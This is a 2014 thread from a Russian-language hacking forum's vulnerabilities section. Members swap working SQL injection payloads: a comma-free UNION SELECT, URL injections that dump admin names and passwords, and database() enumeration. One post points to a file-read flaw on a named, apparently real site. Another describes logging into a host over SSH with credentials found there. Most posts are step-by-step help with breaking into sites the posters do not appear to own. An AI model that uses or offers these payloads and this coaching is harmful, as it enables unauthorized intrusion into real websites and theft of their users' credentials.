HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23631  
Старый 20.07.2014, 00:29
Unknown
Guest
Сообщений: n/a
Провел на форуме:
15642

Репутация: 6
По умолчанию

Цитата:
Сообщение от Грабитель  
Грабитель said:
Пример запроса через конструкцию union select можно? Или Error Based если возможно провести запрос без использования запятых.
Спасибо.
Один из вариантов:

Цитата:
Сообщение от None  
union select 1,2,3 == union select * from (select 1)a join (select 2)b join (select 3)c
 
Ответить с цитированием

  #23632  
Старый 20.07.2014, 00:46
Грабитель
Guest
Сообщений: n/a
Провел на форуме:
69791

Репутация: -7
По умолчанию

Цитата:
Сообщение от UXOR  
UXOR said:
Один из вариантов:
Все получилось, спасибо вам за помощь.
 
Ответить с цитированием

  #23633  
Старый 20.07.2014, 18:28
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422

Репутация: 0
По умолчанию

Каким-то непонятным образом нашёл файл text.py в котором были данные для входа для пользователя sara.

Доступ оказался доступом по SSH

Зашёл и обнаружил проблему -

Из под шелла (пользователь user1):

cd home

ls -la
5 папок с датой за июль

А из под SSH(пользователь sara):

cd home

ls -la


3 папки с датой за июнь

Пытался редактировать файл из под sara - всё редактируется, но при заходе из под шелла - никаких изменений не видно.

Теперь вопрос - почему так? Почему разные даты и разное количество папок?

Вывод id

user1:

uid=510(user1) gid=500(user) groups=500(user)

user:

uid=500(user) gid=500(user) groups=500(user)

sara:

uid=501(sara) gid=501(sara) groups=501(sara),4(adm),10(wheel),500(user)
 
Ответить с цитированием

  #23634  
Старый 20.07.2014, 19:21
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

кто подскажет, что за ошибка? sql inj или нет?

Код:
Code:
hxxp://www.allstarpl.com/shopping/preview_template.cfm?filepath=/webimages/entertainment/previews/ssz/ssz103540.jpg&negno='ssz103540&category=ENTTAIN&orient=H&purchase=yes&p_id=30661d02edffdde46661a-3692319B-E3DC-6A06-525DA1B3F55F24E5_213056427
 
Ответить с цитированием

  #23635  
Старый 21.07.2014, 00:28
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:
кто подскажет, что за ошибка? sql inj или нет?
Код:
Code:
hxxp://www.allstarpl.com/shopping/preview_template.cfm?filepath=/webimages/entertainment/previews/ssz/ssz103540.jpg&negno='ssz103540&category=ENTTAIN&orient=H&purchase=yes&p_id=30661d02edffdde46661a-3692319B-E3DC-6A06-525DA1B3F55F24E5_213056427
Цитата:
Сообщение от None  
The cause of this exception was: java.io.FileNotFoundException: \\Webserver1\inetpub\wwwroot\webimages\entertainme nt\PREVIEWS\ssz\P-ssz103540xx .jpg (The system cannot find the file specified).
Чтение файлов же.

Пилите аналоги нуллбайта в жаве.
 
Ответить с цитированием

  #23636  
Старый 21.07.2014, 03:06
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

Цитата:
Сообщение от madhatter  
madhatter said:
Чтение файлов же.
Пилите аналоги нуллбайта в жаве.
ага, точно, спасибо!
 
Ответить с цитированием

  #23637  
Старый 21.07.2014, 15:37
billybonse
Guest
Сообщений: n/a
Провел на форуме:
12164

Репутация: 1
По умолчанию

Парни, такая ситуация.

Нашел уязвимый сайт, через sql вытащил название таблицы - admin. Узнал названия колонок - admin_name, admin_email,admin_pass, admin_level.

Пишу - http://www.site.com/pages.php?id=-15%20union%20select%201,2,admin_name,4,5,6,7%20fro m%20admin%20limit%200,1--

Ответ - Table 'site.admin' doesn't exist

Подскажите, что за ситуация и как быть?
 
Ответить с цитированием

  #23638  
Старый 21.07.2014, 17:22
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607

Репутация: 19
По умолчанию

Цитата:
Сообщение от billybonse  
billybonse said:
Парни, такая ситуация.
Нашел уязвимый сайт, через sql вытащил название таблицы - admin. Узнал названия колонок - admin_name, admin_email,admin_pass, admin_level.
Пишу - http://www.site.com/pages.php?id=-15%20union%20select%201,2,admin_name,4,5,6,7%20fro m%20admin%20limit%200,1--
Ответ - Table 'site.admin' doesn't exist
Подскажите, что за ситуация и как быть?
запрос должен быть таким примерно

http://www.site.com/pages.php?id=-15+union+select+1,2,concat_ws(0x3a,admin_name,admi n_pass),4,5,6,7+from+[название бд сайта].admin+limit+0,1--

[название бд сайта]- узнайте запросом

http://www.site.com/pages.php?id=-15+union+select+1,2,database(),4,5,6,7--
 
Ответить с цитированием

  #23639  
Старый 21.07.2014, 17:58
billybonse
Guest
Сообщений: n/a
Провел на форуме:
12164

Репутация: 1
По умолчанию

Цитата:
Сообщение от Cybersteger  
Cybersteger said:
запрос должен быть таким примерно
http://www.site.com/pages.php?id=-15+union+select+1,2,concat_ws(0x3a,admin_name,admi n_pass),4,5,6,7+from+[название бд сайта].admin+limit+0,1--
[название бд сайта]- узнайте запросом
http://www.site.com/pages.php?id=-15+union+select+1,2,database(),4,5,6,7--
Название базы radiesse

Table 'radiesse.admin' doesn't exist
 
Ответить с цитированием

  #23640  
Старый 21.07.2014, 22:47
billybonse
Guest
Сообщений: n/a
Провел на форуме:
12164

Репутация: 1
По умолчанию

Неужели никто не знает, что делать?

Еще пару вопросов, если позволите.

1. нашел уязвимый сайт, http://site.com/pages.php?id=-31%20union%20select%201,2,3,4,5--, выдает цифру 4

дальше пишу http://site.com/pages.php?id=-31%20union%20select%201,2,3,version(),5-- пишет 403 Forbidden

Почему?

2. Опять уязвимый сайт http://www.site.by/pages.php?id=7645

Перебираю колонки, сначала пишет he used SELECT statements have a different number of columns in query, дохожу до цифры 5, пишет Unknown column 'parent_id' in 'field list' in query. Если продолжаю перебирать колонки, опять выдает ошибку "неверное число колонок". Это иньекция или нет?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ